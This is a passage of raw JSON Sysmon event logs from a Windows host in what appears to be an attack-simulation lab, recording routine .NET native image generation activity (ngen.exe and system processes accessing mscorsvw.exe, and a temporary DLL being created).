05:58:38.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010AE6B0D00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:39.121\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048F-5F25-0000-001095360E00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:39.121","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048F-5F25-0000-001095360E00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:39.121\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048F-5F25-0000-001095360E00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:39.121","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048F-5F25-0000-001095360E00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:39","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:39.121\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048F-5F25-0000-001095360E00}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:39.121","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048F-5F25-0000-001095360E00}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:40.840\r\nProcessGuid: {A837DB8D-048F-5F25-0000-001095360E00}\r\nProcessId: 4712\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\Microsoft.VisualBasic.Compatibility.dll\r\nCreationUtcTime: 2020-08-01 05:58:40.840","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:40.840","ProcessGuid":"{A837DB8D-048F-5F25-0000-001095360E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\Microsoft.VisualBasic.Compatibility.dll","CreationUtcTime":"2020-08-01 05:58:40.840","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.886\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.886","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.886\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.886","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.886\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.886","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.949\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010B91A0D00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.949","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010B91A0D00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010B91A0D00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 